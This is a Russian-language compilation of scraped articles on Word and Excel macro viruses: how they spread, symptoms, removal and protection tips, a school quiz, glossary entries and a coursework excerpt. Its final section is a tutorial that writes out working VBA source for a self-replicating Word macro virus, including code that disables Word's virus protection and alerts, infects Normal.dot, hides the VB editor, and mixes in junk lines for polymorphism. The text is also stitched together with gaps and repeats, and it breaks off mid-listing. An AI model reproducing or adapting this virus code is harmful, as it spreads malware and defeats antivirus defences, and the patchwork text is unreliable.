После того как мы определились, что такое макровирусы, давайте разберемся каким образом они проникают в систему и заражают компьютер. Простой способ их размножения позволяет в кратчайшие сроки поражать максимальное количество объектов. Благодаря возможностям макроязыков, они при закрытии или открытии зараженного документа проникают в программы, к которым идет обращение.

Какие файлы заражают макро вирусы

То есть, при использовании графического редактора макровирусы заражают все, что связано с ним. Более того, некоторые активничают все время, пока текстовый или графический редактор работают, или вовсе до полного выключения ПК.

В чем заключается принцип их работы

Какие файлы заражают макро вирусыИх действие происходит по следующему принципу: работая с документами, Microsoft Word выполняет разнообразные команды, отдающиеся на языке макрос. Первым делом программа проникает в главный шаблон, через который открываются все файлы этого формата. При этом вирус копирует свой код в макросы, которые обеспечивают доступ к главным параметрам. Выходя из программы, файл в автоматическом режиме сохраняется в dot (применяется для создания новых документов). После чего он попадает в стандартные макросы, стремясь перехватить отправляемые другим файлам команды, заражая и их.

Заражение осуществляется в следующих случаях:

Такие вирусы поражают обычно все файлы, созданные и привязанные к программам на макроязыке.

Не удалось устранить проблему? Обратитесь за помощью к специалисту!

Какой вред они приносят

Не стоит недооценивать макровирусы, так как они относятся к полноценным вирусам и несут компьютерам значительный вред. Они могут легко удалить, скопировать или редактировать любые объекты, содержащие, в том числе, и личную информацию. Более того, им также доступна передача информации другим людям с помощью электронной почты.

Какие файлы заражают макро вирусы

Более сильные утилиты вообще могут форматировать винчестеры и контролировать работу всего ПК. Именно поэтому мнение, что подобного рода компьютерные вирусы несут в себе опасность исключительно для графических и текстовых редакторов, ошибочное. Ведь такие утилиты как Word и Excel работают во взаимодействии с целым рядом других, которые в этом случае также подвергаются опасности.

Распознаем зараженный файл

Зачастую файлы, зараженные макровирусами и поддавшиеся их влиянию, определить совсем не сложно. Ведь они функционируют совсем не так, как другие утилиты такого же формата.

Опасность можно определить по следующим признакам:

Кроме того, угроза зачастую легко обнаруживается визуально. Их разработчики обычно указывают во вкладке «Сводка» такую информацию, как название утилиты, категория, тема комментарии и имя автора, благодаря чему от макровируса можно избавиться значительно быстрее и проще. Вызвать ее можно при помощи контекстного меню.

Способы удаления

Обнаружив подозрительный файл или документ, первым делом просканируйте его антивирусом. При обнаружении угрозы антивирусы попробуют вылечить его, а в случае неудачи полностью закроют доступ к нему.

Не удалось устранить проблему? Обратитесь за помощью к специалисту!

В случае если был заражен весь компьютер, следует воспользоваться аварийным загрузочным диском, который содержит антивирус с последней базой данных. Он проведет сканирование винчестера и обезвредит все найденные им угрозы.

Если защититься таким образом не получается, ваш антивирус ничего не может сделать, а аварийного диска нет, то следует попробовать метод «ручного» лечения:

Таким образом, вы удалите макровирус с зараженного документа, однако это ни в коем случае не значит, что он не остался в системе. Именно поэтому рекомендуется при первой возможности просканировать весь персональный компьютер и все его данные антивирусом или специальными бесплатными сканерами (их преимущество в том, что они не требуют установки).

Рекомендации по защите ПК

Процесс лечения и очистки компьютера от заражения макровирусами достаточно сложный, поэтому лучше предотвратить заражение еще на начальных этапах.

Таким образом, вы обезопасите себя, и макровирусы никогда не проникнут в соответствующие файлы.

Не удалось устранить проблему? Обратитесь за помощью к специалисту!

Видео по очистке системы от вирусов

Профессиональная помощь

Если не получилось самостоятельно устранить возникшие неполадки,
то скорее всего, проблема кроется на более техническом уровне.
Это может быть: поломка материнской платы, блока питания,
жесткого диска, видеокарты, оперативной памяти и т.д.

Важно вовремя диагностировать и устранить поломку,
чтобы предотвратить выход из строя других комплектующих.

В этом вам поможет наш специалист.

Это бесплатно и ни к чему не обязывает.
Мы перезвоним Вам в течении 30 мин.

Источник

Какие файлы заражают макровирусы

Макровирусы представляют собой потенциально нежелательные программы, которые написанные на макроязыках, встроенных в текстовые или графические системы обработки данных. Самые распространенные версии вирусов для Microsoft Word, Excel и Office 97. Какие файлы заражают макро вирусыТак как создать макровирус проще простого, то встречаются они довольно часто. Следует быть очень осторожным при скачивании сомнительных документов из интернета. Многие пользователи недооценивают возможности данных программ, совершая при этом огромнейшую ошибку.

Каким образом макровирус заражает компьютер

Благодаря простому способу размножения макровирусы способны в кратчайшие сроки поразить большое количество файлов. Используя возможности макроязыков, они, при открытии или закрытии зараженного документа, с легкостью проникают во все программы, к которым, так или иначе, идет обращение. То есть, если вы, используя графический редактор, открываете изображение, то макровирус будет распространяться по файлам данного типа. А некоторые из вирусов этого вида могут быть активными до тех пор, пока открыт графический или текстовый редактор, или вовсе до самого выключения персонального компьютера.

Действие макровирусов происходит по такому принципу: при работе с документом Microsoft Word считывает и выполняет различные команды, которые отдаются на языке макрос. Первым делом вредоносная программа постарается проникнуть в главный шаблон документа, благодаря которому происходит открытие всех файлов данного формата. При этом макровирус создает копию своего кода в глобальные макросы (макросы, обеспечивающие доступ к ключевым параметрам) А при выходе из используемой программы автоматически сохраняется в dot – файл (используется для создания новых документов). После вирус вторгается в стандартные макросы файла с целью перехватить команды, посылаемые другим файлам, таким образом, заражая и их тоже.

Заражение макровирусом происходит в одном из четырех случаев:

Повредить макровирусы могут все файлы, которые привязаны к программе на макроязыке.

Какой вред несут в себе макровирусы

Ни в коем случае не стоит недооценивать макровирусы, так как они являются такими же полноценными вирусами и могут нанести персональному компьютеру не меньший вред. Макровирусы вполне в состоянии удалить, редактировать или скопировать файлы, содержащие личную информацию и передать ее другому человеку по электронной почте. А более сильные программы могут вообще отформатировать винчестер и взять под контроль ваш компьютер. Так что мнение о том, что макровирусы опасны только для текстовых редакторов, ошибочное, ведь зачастую Word и Excel при работе контактируют с огромным количеством разнообразных программ.

Как распознать зараженный файл

Обычно файлы, поддавшиеся влиянию макровируса, определить довольно просто, ведь они работают не так, как другие программы того же формата.

Наличие макровирусов можно определить по таким признакам:Какие файлы заражают макро вирусы

Как удалить зараженный вирусом файл с компьютера

Первым делом при обнаружении подозрительного документа или файла отсканируйте его с помощью антивируса. Практически всегда антивирусы при обнаружении угрозы постараются вылечить файл или же полностью перекроют к нему доступ. В более тяжелых случаях, когда заражен уже весь компьютер воспользуйтесь аварийным установочным диском, содержащим антивирус с обновленной базой данных. Он отсканирует винчестер и обезвредит вредоносные программы, которые найдет. В том случаи, если антивирус бессилен, а аварийного диска под рукой нет, воспользуйтесь методом «ручного» лечения:

В результате этих действий мы удалили вирус с зараженного документа, но это не значит, что он не мог остаться в системе компьютера, поэтому при первой, же возможности просканируйте антивирусом все объекты вашего ПК.

Как уберечься от макровирусов

Источник

Макровирусы: механизм воздействия и методы обнаружения

Какие файлы заражают макро вирусы

Многие пользователи зачастую недооценивают возможности макровирусов, не придавая им значения, тогда как макрос, написанный на языке VBA (Visual Basic for Applications) и интегрированный в документ Microsoft Word или таблицу Microsoft Excel, обладает полноценными программными функциями и возможностями. Если он сможет проникнуть на компьютер, то ему не составит труда отформатировать винчестер, скопировать конфиденциальную информацию (допустим, пароли от личного кабинета интернет-банка или почтового клиента) и передать её третьим лицам, либо уничтожить интересующие злоумышленника файлы.

Что такое макровирусы?

По сути это вредоносный код, написанный на каком-либо макроязыке и встроенный в систему обработки данных, например, в редактор текста, графики или электронных таблиц.
Чтобы размножаться — переходить от одного зараженного файла к другому, — такие вирусы используют особенности макроязыков. При открытии или закрытии инфицированного объекта макровирусы получают доступ к управлению: они перехватывают стандартные функции файлов, а после заражают другие документы, к которым обращается пользователь.
Подавляющее большинство макровирусов резидентно. Они способны к активности не только в момент закрытия или открытия файла, а оказывают вредоносное воздействие до тех пор, пока запущен тот или иной редактор – текстовый или графический. Многие, кстати, могут находиться в оперативной память вплоть до выключения ПК.
Наиболее распространенными считаются вирусы, поражающие приложения из популярного пакета Microsoft Office — Word и Excel. Причем для их разработки достаточно зайти в один из этих редакторов, выбрать в меню создание макроса и запустить программную среду VBA.

Как они работают?

Для начала разберемся, зачем нужны макросы. Во время работы с документами редактор выполняет множество задач – открыть, закрыть, сохранить, печатать – для чего он ищет встроенные в программу макросы (например, при команде «Файл – Сохранить» идет вызов макроса FileSave). Есть также небольшое число макросов, которые вызываются автоматически, если возникает определенная ситуация. Например, при открытии документа Word проверяет его на макрос AutoOpen. Если таковой присутствует, то Word его выполняет.

Поражающие текстовый редактор Word макровирусы пользуются одной из четырех схем:

В вирусе находится переопределенный стандартный макрос системы, который ассоциирован с каким-либо пунктом меню.

Происходит автоматический вызов макроса при нажатии какой-то определенной клавиши или же их комбинации.

Размножение вируса происходит только после того, как пользователь запустит его выполнение.

В самом вирусе уже присутствует автоматический макрос.

Мы открываем зараженный документ Word, после чего макровирус копирует свой код в его глобальные макросы. Когда мы закрываем документ и выходим из редактора, происходит автоматическая запись всех глобальных макросов вместе с вирусными в dot-файл. После происходит переопределение вирусом стандартных макросов, используемых в текстовом редакторе, с помощью которых вирус перехватывает все команды, обращенные к каким-либо файлам. Как только будет вызвана определенная команда, файл, к которому обращается пользователь, будет заражен.

Как обнаружить макровирус?

Есть несколько ярких признаков того, что ваш компьютер поражен макровирусом:

при заражении редактор странно реагирует на команды пользователя;

у вас не получается сохранить документ в другом формате через команду «Сохранить как»;

вы не можете воспользоваться вкладкой «Уровень безопасности»;

недоступна функция записи файла в другой каталог, либо на другой диск при помощи команды «Сохранить как»;

не получается сохранять внесенные в документ изменения командой «Сохранить»;

поскольку многие вирусы написаны с ошибками и в разных версиях редакторов могут работать не корректно, то периодически во время работы возможно появление всплывающего окна с кодом ошибки;

часто вирус можно обнаружить визуально: многие создатели довольно тщеславны, они заполняют поля на вкладке «Сводка», где обычно указывается следующая информация – Название, Тема, Автор, Категория, Ключевые слова и Комментарии.

Источник

Помогите пожалуйста с информатикой

12.Какие файлы заражают макро-вирусы?
1) исполнительные;
2)файлы документов Word и элект. таблиц Excel;
3)графические и звуковые;
4) html документы.

13.К каким вирусам относится «троянский конь»?
1)макро-вирусы
2)скрипт-вирусы
3)интернет-черви
4) загрузочные вирусы.

14.Неопасные компьютерные вирусы могут привести
1) к сбоям и зависаниям при работе компьютера;
2) к потере программ и данных;
3) к форматированию винчестера;
4) к уменьшению свободной памяти компьютера.

15.Опасные компьютерные вирусы могут привести…
1) к сбоям и зависаниям при работе компьютера;
2) к потере программ и данных;
3) к форматированию винчестера;
4) к уменьшению свободной памяти компьютера.

16.Какой вид компьютерных вирусов внедряются и поражают исполнительный файлы с расширением *.exe, *.com и активируются при их запуске?
1) файловые вирусы;
2) загрузочные вирусы;
3) макро-вирусы;
4) сетевые вирусы

Источник

Современные компьютерные вирусы

Конспект подготовлен по материалам

Макровирусы

Макровирусы используют возможности макроязыков, встроенных в системы обработки данных (текстовые редакторы, электронные таблицы и т.д.). Для существования вирусов в конкретной системе необходимо наличие встроенного в систему макроязыка со следующими возможностями:

1) привязка программы на макроязыке к конкретному файлу;

2) копирование макропрограмм (далее макросов) из одного файла в другой;

3) возможность получения управления макросом без вмешательства пользователя (автоматические или стандартные макросы).

Заметим, что макросы могут быть привязаны к конкретному файлу (AmiPro) или находится внутри файла (Word, Excel); макро-язык позволяет копировать файлы (AmiPro) или перемещать макро-программы в служебные файлы системы (Word, Excel); при работе с файлом при определенных условиях (открытие, закрытие и т.д.) вызываются макросы, которые либо определены специальным образом (AmiPro), либо имеют стандартные имена (Word, Excel).

Данная особенность макроязыков предназначена для автоматической обработки данных в больших организациях или в глобальных сетях и позволяет организовать так называемый «автоматизированный документооборот». С другой стороны, возможности макро-языков таких систем позволяют вирусу переносить свой код в другие файлы, и таким образом заражать их.

Макровирусы активны не только в момент открытия/закрытия файла, но до тех пор, пока активен сам редактор.

Word/Excel-вирусы

Вирусы семейства Macro.Word содержат в себе как минимум один из автоматических макросов (AutoOpen, AutoClose, AutoExec, AutoExit, AutoNew) или один из стандартных макросов (FileOpen, FileClose, FileSaveAs и т.д.). Если документ заражен, то при открытии документа Word вызывает зараженный автоматический макрос AutoOpen (или AutoClose при закрытии документа) и, таким образом, запускает код вируса, если это не запрещено системной переменной DisableAutoMacros. Если же вирус содержит макросы со стандартными именами, то они получают управление при вызове соответствующего пункта меню (File/Open, File/Close, File/SaveAs).

Во всех известных вирусах семейства Macro.Word макросы AutoOpen/AutoClose и (или) макросы со стандартными именами содержат команды переноса макросов вируса в область глобальных (общих) макросов Word, т.е. при запуске Auto-макроса или при вызове соответствующей стандартной функции вирус заражает область глобальных макросов. При выходе из Word глобальные макросы (включая макросы вируса) автоматически записываются в DOT-файл глобальных макросов (обычно таким файлом является NORMAL.DOT). Таким образом, при следующем запуске Word’а вирус активизируется в тот момент, когда Word грузит глобальные макросы, т.е. сразу.

Таким образом, если вирус перехватывает макрос FileSaveAs, то заражается каждый DOC-файл, сохраняемый через перехваченный вирусом макрос. Если перехвачен макрос FileOpen, то вирус записывается в файл при его считывании с диска.

Следует отметить, что Word позволяет шифровать присутствующие в документе макросы. Таким образом, некоторые Macro.Word-вирусы присутствуют в зараженных документах в зашифрованном виде.

Характерными проявлениями вирусов семейства M acro.Word являются следующие.

1. Невозможность конвертирования зараженного документа Word в другой формат.

2. Невозможность записи документа в другой каталог/на другой диск командой «Save As».

3. Зараженные файлы имеют формат Template. При заражении вирусы WinWord конвертируют файлы из формата Word Document в Template.

Защита от макровирусов

Существует несколько приемов и встроенных в Word/Excel функций, направленных на предотвращение запуска вируса. Наиболее действенной из них является защита от вирусов, встроенная в Word и Excel (начиная с версий 7.0a). Эта защита при открытии файла, содержащего любой макрос, сообщает о его присутствии и предлагает запретить этот макрос. В результате макрос не только не выполняется, но и не виден средствами Word/Excel.

Запуск Word с опцией /M (или с нажатой клавишей Shift) отключает только один макрос AutoExec и таким образом также не может служить надежной защитой от вируса.

Java-вирусы

Написаны на языке программирования Java и представляют из себя стандартные Java-программы. Заражают приложения Java (Java applications). Размножаются, если зараженный файл запустить как дисковую Java-программу (application) при помощи Java-машины.

Первый известный вирус, заражающий приложения Java, обнаружен в августе 1998 года.

Обычно эти вирусы не способны размножаться при запуске под известными броузерами (при стандартных настройках). Встроенные в броузеры системы защиты не позволяют вирусу получить доступ к файлам.

Иногда при размножении Java-вирус записывает в поражаемые Java-файлы только небольшую часть своего кода (так называемый «стартер»), а основной код вируса при этом хранится на удаленном Web-сервере.

Заметим, что разделение кода вируса на две части: «стартер – вирус» позволяет автору вируса «апгрейдить» его код и заражать удаленные компьютеры новыми версиями вируса.

Вирусы работоспособны только в системах с установленным PHP-нтерпретатором.

Первый известный вирус, заражающий скрипт-программы PHP, был обнаружен в октябре 2000 года.

Некоторые скрипт-вирусы используют интересный метод заражения: в заражаемый файл записывается не код вируса, а всего одна команда «include», которая подключает («вставляет») код вируса в файл при его обработке.

При открытии зараженного файла скрипт-машина PHP обрабатывает команду «include», считывает код вируса из указанного файла и выполняет его.

Таким образом, код вируса присутствует в системе в единственном экземпляре, а все зараженные файлы всего лишь подключают его. Заметим, что при таком способе заражения вирус не в состоянии самостоятельно распространяться за пределы зараженного компьютера.

Вирусы, которые распространяются в компьютерной сети.

Они не изменяют файлы или секторы на дисках.

Вирус-червь проникает в память компьютера из компьютерной сети, вычисляет сетевые адреса других компьютеров и рассылает по этим адресам свои копии.

Такие вирусы иногда создают рабочие файлы на дисках системы, но могут вообще не обращаться к ресурсам компьютера (за исключением оперативной памяти).

Файловые черви

Источник

Макровирус

Макровирус — это разновидность компьютерных вирусов разработанных на макроязыках, встроенных в такие прикладные пакеты ПО, как Microsoft Office. Для своего размножения такие вирусы используют возможности макроязыков и при их помощи переносятся из одного зараженного файла в другие. Большая часть таких вирусов написана для MS Word.

См. также

Какие файлы заражают макро вирусы
Какие файлы заражают макро вирусы Вредоносное программное обеспечение
Инфекционное вредоносное ПОКомпьютерный вирус (список) · Сетевой червь (список) · Троянская программа · Загрузочный вирус · Хронология
Методы сокрытияБэкдор · Компьютер-зомби · Руткит
Вредоносные программы
для прибыли
Adware · Privacy-invasive software · Ransomware (Trojan.Winlock) · Spyware · Бот · Ботнет · Веб-угрозы · Кейлогер · Формграббер · Scareware (Лжеантивирус) · Порнодиалер
По операционным системамВредоносное ПО для Linux · Вирусы для Palm OS · Макровирус · Мобильный вирус
ЗащитаDefensive computing · Антивирусная программа · Межсетевой экран · Система обнаружения вторжений · Предотвращение утечек информации · Хронология антивирусов
КонтрмерыAnti-Spyware Coalition · Computer surveillance · Honeypot · Operation: Bot Roast

Полезное

Смотреть что такое «Макровирус» в других словарях:

Макровирус — файловый вирус, существующий в виде макроса для определенного приложения. При открытии зараженного файла вирус прикрепляет себя к приложению и заражает все файлы, к которым обращается программа. По английски: Macro virus См. также: Файловые… … Финансовый словарь

макровирус — сущ., кол во синонимов: 1 • программа (114) Словарь синонимов ASIS. В.Н. Тришин. 2013 … Словарь синонимов

Компьютерный вирус — Начало исходного кода примитивного вируса для MS DOS на языке ассемблера … Википедия

Хронология компьютерных вирусов и червей — Здесь приведён хронологический список появления некоторых известных компьютерных вирусов и червей, а также событий, оказавших серьёзное влияние на их развитие. Содержание 1 2012 2 2011 3 2010 4 2009 … Википедия

Антивирусная программа — (антивирус) любая программа для обнаружения компьютерных вирусов, а также нежелательных (считающихся вредоносными) программ вообще и восстановления зараженных (модифицированных) такими программами файлов, а также для профилактики … … Википедия

Система обнаружения вторжений — (СОВ) программное или аппаратное средство, предназначенное для выявления фактов неавторизованного доступа в компьютерную систему или сеть либо несанкционированного управления ими в основном через Интернет. Соответствующий английский… … Википедия

Межсетевой экран — Иллюстрация, показывающая расположение сетевого экрана (Firewall) в сети … Википедия

Adware — (англ. ad, advertisement «реклама» и software «программное обеспечение») программное обеспечение, содержащее рекламу. Также, термином «adware» называют вредоносное программное обеспечение, основной целью которого является показ рекламы во… … Википедия

Spyware — (шпионское программное обеспечение) программное обеспечение, осуществляющее деятельность по сбору информации о конфигурации компьютера, деятельности пользователя и любой другой конфиденциальной информации без согласия самого пользователя.… … Википедия

Вредоносная программа — (на жаргоне антивирусных служб «зловред», англ. malware, malicious software «злонамеренное программное обеспечение») любое программное обеспечение, предназначенное для получения несанкционированного доступа к вычислительным… … Википедия

Источник

Вирусы в макросах документов: способы внедрения, распространения и защиты

Автор: Пользователь скрыл имя, 03 Мая 2012 в 14:01, курсовая работа

Описание работы

Компью́терный ви́рус — разновидность компьютерных программ или вредоносный код, отличительной особенностью которых является способность к размножению (саморепликация). В дополнение к этому вирусы могут без ведома пользователя выполнять прочие произвольные действия, в том числе наносящие вред пользователю и/или компьютеру.
Даже если автор вируса не программировал вредоносных эффектов, вирус может приводить к сбоям компьютера из-за ошибок, неучтённых тонкостей взаимодействия с операционной системой и другими программами. Кроме того, вирусы обычно занимают некоторое место на накопителях информации и отбирают некоторые другие ресурсы системы. Поэтому вирусы относят к вредоносным программам.

Содержание

Введение
4
1. Макровирусы
6
1.1 Макровирусы общие сведения
7
1.2 Макровирусы принципы работы
8
2. Постановка задачи
10
3. Обзор наиболее известных вирусов в макросах документов
11
3.1 Распространение макровирусов
13
3.2 Алгоритм работы макровирусов для Microsoft Office
14
4. Способы защиты от вирусов в макросах документов
16
4.1 Обнаружение макровируса
17
4.2 Восстановление пораженных объектов
18
5. Создание вирусов в макросах и их внедрение в файлы документов
19
5.1 Постоянный вывод сообщения на экран
19
5.2 Запуск приложении из макровируса
19
5.3 Автозапуск и выполнение
20
Заключение
21
Список использованной литературы

Работа содержит 1 файл

курсовой ибизи.docx

Процедуры-программы могут исполняться непосредственно или же активироваться по запросу из других макросов. Их синтаксис следующий:

приWord97:
C:\ProgramFiles\ MicrosoftOffice\Office\saver. dll

Данный файл имеет размер 29696 байт и представляет собой модифицированный вирусом файл-шаблон Normal.dot.

после этого заменяет строки, сохраняет документ и закрывает его.

Благоприятным фактором распространения вируса W97M.Ethan служит то, что в Microsoft Word макросы автоматически запускаются при открытии любого документа, его закрытии, сохранении и т.д.

Кроме того, имеется так называемый общий шаблон NORMAL.DOT и макросы, помещенные в общий шаблон, автоматически запускаются при открытии любого документа. Если учесть, что копирование макросов из документа в документ (в частности, в общий шаблон) выполняется всего одной командой, то среда Microsoft Word представляется идеальной для существования макрокомандных вирусов подобныхW97M.Ethan

При заражении документа или общего шаблона вирус использует временный текстовый файл «C:\Ethan.___» который является источником его вирусного кода. Данному файлу вирус присваивает атрибуты системный и скрытый.

4. Распространение макровирусов

При запуске Word’а Normal.dot передает управление вирусному «файлу-шаблону» saver.dll. Опыты, проведенные с вирусом на тест-машине, дали следующие результаты:

1. Вирус заражает документы при их закрытии: записывает в их макросекцию свой код, используя собственный макрос AutoSave («Автосохранение»). При этом вирус блокирует стандартный запрос о подтверждении сохранения документа с внесенными в него изменениями, в результате чего все произведенные в документе изменения как вирусом, так и пользователем, автоматически сохраняются без ведома последнего.

2. В том случае, если документ был просто открыт пользователем или редактировался и запоминался через опцию «Сохранить», вирус заражает этот документ; если же последний перезапоминался пользователем через опцию «Сохранить как. «, то вирус заражает только пересохраненный документ, а исходный оставляет без изменения. При этом и в том, и в др. случаях увеличение размера файлов после заражения зависит от ряда условий и не имеет точного значения.

3. Учитывая тот факт, что вирус заражает документы повторно даже просто при их просмотре без внесения пользователем каких-либо изменений, размер файлов постоянно увеличивается, в связи с чем на старых машинах с жесткими дисками небольшого объема свободное место очень быстро уменьшается. Также может наблюдаться сильное торможение машины при работе с Word’ом, что связано с дополнительными затратами ресурсов оперативной памяти на обработку «раздутых» вирусом макросекций зараженных документов и в конечном итоге может стать реальной причиной зависания последних при их открытии.

4. После заражения первого документа на чистой машине вирус создает свой подкаталог:

приWord97:
C:\ProgramFiles\ MicrosoftOffice\Office\Doc_ Copy\

приWord2003:
C:\ProgramFiles\ MicrosoftOffice\OFFICE11\Doc_ Copy\

4.1 Алгоритм работы макровирусов для Microsoft Office

Большинство известных Word-вирусов (версий 6, 7 и Word 97) при запуске переносят собственный код в область глобальных макросов документа («общие» макросы).

При выходе из Word глобальные макросы (включая макросы вируса) автоматически записываются в DOT-файл глобальных макросов (обычно таким файлом является NORMAL.DOT). Таким образом, вирус активизируется в тот момент, когда Word грузит глобальные макросы.

Затем вирус переопределяет (или уже содержит в себе) один или несколько стандартных макросов (например, FileOpen, FileSave, FileSaveAs, FilePrint) и перехватывает таким образом команды работы с файлами. При вызове этих команд заражается файл, к которому идет обращение. Для этого вирус конвертирует файл в формат Template (что делает невозможными дальнейшие изменения формата файла, т. е. конвертирование в какой-либо не-Template формат) и записывает в файл свои макросы, включая Auto-макрос.

Другой способ внедрения вируса в систему базируется на так называемых «Add-in» файлах, т. е. файлах, являющихся служебными дополнениями к Word. В этом случае NORMAL.DOT не изменяется, а Word при запуске загружает макросы вируса из файла (или файлов), определенного как «Add-in». Этот способ практически полностью повторяет заражение глобальных макросов за тем лишь исключением, что макросы вируса хранятся не в NORMAL.DOT, а в каком-либо другом файле.

Возможно также внедрение вируса в файлы, расположенные в каталоге STARTUP. В этом случае Word автоматически подгружает файлы-шаблоны из этого каталога, но такие вирусы пока не встречались.
Рассмотрим вирус, предназначенный для заражения Word-документов. Этот вирус использует служебное имя FileOpen. Процедура FileOpen() выполняется всякий раз, когда пользователь открывает файл и маскируется под обычный диалог Файл->Открыть файл.

InfectorPath = MacroContainer.Path + «\» + MacroContainer.Name

Rem Переменная InfectorPath определяет путь к документу, содержащему вирус.

Rem Имитируется диалог Файл->Открыть файл

For Each VbComponent In ActiveDocument.VBProject. VBComponents

If VbComponent.Name = «Virus» Then Infected = True

Rem Здесь открытый пользователем файл проверяется на наличие вируса

If Not Infected Then

Rem Если файл не заражен, вирус дописывается в файл

CopyMacro ActiveDocument.Path + «\» + ActiveDocument.Name, InfectorPath

Public Sub CopyMacro(NewDestination, NewSource)

On Error GoTo nextline

Application.OrganizerCopy Source:= _

NewSource, Destination:=NewDestination, Name:=»Virus», Object:= _

Источник

Макровирусы и их защита

Партнер

Какие файлы заражают макро вирусы

Итак теория: практически все макро вирусы заражают файл Normal.dot
— это базовый шаблон, который загружается при открытии документа, при создании нового документа.
Что же нам дает заражение Normal.dot? При зараженном Normal.dot, когда создаётся новый файл
в начале отрабатывает макрос, загруженный в Normal.dot.
Это нам даёт возможность заражать все открытые или новые документы (при заражённом Normal.dot).

Теперь разберём алгоритм простейшего макровируса:

1)Если Normal.dot не заражён, то сохраняем текст макроса в каком-нибудь внешнем
скрытом файле.

2)Проверим если текущий документ не заражён, то заразим его.

3)Если Normal.dot не заражён, то инфицируем его.

Алгоритм довольно прост, не правда ли? Давайте теперь его реализуем.

‘——————————-
Sub Document_Close()
‘ h0b0t Word 97/2000 macr0 virus
Application.DisplayAlerts = 0 ‘Отключить тревогу
Options.VirusProtection = False ‘Отключить сообщения о вирусах

If Application.UserName <> «[h0b0t]» Then
ActiveDocument.VBProject.VBComponents(«ThisDocument»).Export «c:\Windows\sl0n.vxd»
End If
‘Экспортирование файла с макросами
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule

If AD.lines(1, 1) = «» Then ‘Если документ не заражён, то заразим
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Open «c:\Windows\sl0n.vxd» For Input As #1
If LOF(1) = 0 Then GoTo quit1
i = 1

Do While Not EOF(1)
Line Input #1, a
If i > 8 Then
If i = 10 Then
t.CodeModule.InsertLines i, «sub Document_Close()»
Else: t.CodeModule.InsertLines i, a
End If
End If
i = i + 1
Loop
quit1:
Close #1

If Application.UserName <> «[h0b0t]» Then ‘Если документ не заражён, то заразим
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
Open «c:\Windows\sl0n.vxd» For Input As #1
If LOF(1) = 0 Then GoTo quit
i = 1

Do While Not EOF(1)
Line Input #1, a
If i > 8 Then
If i = 10 Then
t.CodeModule.InsertLines i, «sub AutoClose()»
Else: t.CodeModule.InsertLines i, a
End If
End If
i = i + 1
Loop
quit:
Close #1
Application.UserName = «[h0b0t]»
End If
End Sub
‘——————————-

Данный вирус заражает документы при их закрытии, но его легко можно модифицировать для
заражения при создании нового документа. Для этого всего лишь необходимо заменить
AutoClose() на AutoNew(). Аналогичным образом можно сделать при открытии документа или при сохранении (AutoOpen,
AutoSave).

Вообще существует множество способов инфицирования документов Word, мы использовали
непосредственную работу с файлами и метод Export для создания файла на диске с текстом
макроса и копированием его в инфицируемые документы.

В макро вирусах применяются все те же вирусные технологии,
что и в обычных вирусах, т.е. стэлс технология, антиэвристика, полиморфизм.

Начнём наше рассмотрение со стэлс технологий. В чём же заключаются стэлс технологии
применительно к макро вирусам? В большинстве своём это сокрытие
собственного кода от глаз пользователей. Реально на практике это выглядит следующим образом: отключаются в меню
Word’a опции «Редактор VB» и отключается кнопка
«Break». После этого пользователь заподозривший наличие макро вируса если полезет посмотреть на
макросы в Word’e ничего не увидит, что нам и требовалось.
Теперь практическая часть к нашему вирусу достаточно добавить следующие строки:

‘——————————-
Private Sub Stealth()
Application.ShowVisualBasicEditor = 0 ‘Вырубить показ Редактора VB
Application.EnableCancelKey = 0 ‘Отключить клавишу Break
End Sub
‘——————————-
Sub ViewVBCode()
Stealth
End Sub
‘——————————-
Sub ToolsMacro()
Stealth
End Sub
‘——————————-
Sub FileTemplates()
Stealth
End Sub
‘——————————-

После этого можно считать, что мы использовали стэлс технологию для перехвата трёх макросов:

ViewVBCode(), ToolsMacro(), FileTemplates().

Так же имеет смысл отключение тревоги и сообщений о вирусах, зачем пугать пользователей?

После этого AVP и Dr.Web у меня перестали опознавать
даже известные им вирусы, которые до этого успешно обнаруживали.

И последняя технология это как обычно полиморфизм или же «мутационная» технология.
Смысл полиморфной технологии применительно к макро вирусам идентичен полиморфизму для
обычных вирусов. Существует два пути мутациий
— первый и самый распространённый это шифрование кода макроса.
А второй это разбавление кода макроса мусорными командами.
Так же возможно комбинирование этих двух способов рассмотрим более конкретно второй способ.
Данный генератор полиморфного кода предназначен для разбавления реальных инструкций мусором.

Рассмотрим саму функцию:

Private Function poly() As String

Dim mas(20)
mas(1) = «‘rghuyhewh» ‘
mas(2) = «‘[+]-31337-[+]» ‘
mas(3) = «‘heh-polymorf-engine-sl0n-(c)» ‘ Это мусорные
mas(4) = «‘sd,jghsdighiuehrwiur345t3bk» ‘ строки которыми мы
mas(5) = «‘:for bc=1 to 987: next bc» ‘ будем разбавлять основной
mas(6) = «‘436ghdfjhdfjddfh» ‘ код

oncemore:
a = Rnd(4) ‘
a = a * 10 ‘ Это генератор случайных чисел
a = Int(a) ‘ В итоге данная функция возвращает
If a > 6 Then GoTo oncemore ‘ случайную строку из масива mas
poly = mas(a) ‘

Теперь рассмотрим вирус, который сочетает в себе все три технологии, то есть он будет
использовать как стэлс технологию так и полиморфную технологию плюс пара антиэвристических
инструкций.

Dim mas(20)
mas(1) = «‘rghuyhewh» ‘
mas(2) = «‘[+]-31337-[+]» ‘
mas(3) = «‘heh-polymorf-engine-sl0n-(c)» ‘ Это мусорные
mas(4) = «‘sd,jghsdighiuehrwiur345t3bk» ‘ строки которыми мы
mas(5) = «‘:for bc=1 to 987: next bc» ‘ будем разбавлять основной
mas(6) = «‘436ghdfjhdfjddfh» ‘ код

oncemore:
a = Rnd(4) ‘
a = a * 10 ‘ Это генератор случайных чисел
a = Int(a) ‘ В итоге данная функция возвращает
If a > 6 Then GoTo oncemore ‘ случайную строку из масива mas
poly = mas(a) ‘

End Function
‘——————————-
Sub Document_Close()
‘Application.UserName = «sl0n»
‘ h0b0t Word 97/2000 macr0 virus
Application.DisplayAlerts = 0 ‘Отключить тревогу
Options.VirusProtection = False ‘Отключить сообщения о вирусах

fonta = Selection.Font.Name ‘
Selection.Font.Name = «Arial» ‘ Антиэвристика
Selection.Font.Name = fonta ‘

If Application.UserName <> «[h0b0t]» Then
ActiveDocument.VBProject.VBComponents(«ThisDocument»).Export «c:\Windows\sl0n.vxd»
End If
‘Экспортирование файла с макросами
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule

If AD.lines(1, 1) = «» Then ‘Если документ не заражён, то заразим
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Open «c:\Windows\sl0n.vxd» For Input As #1
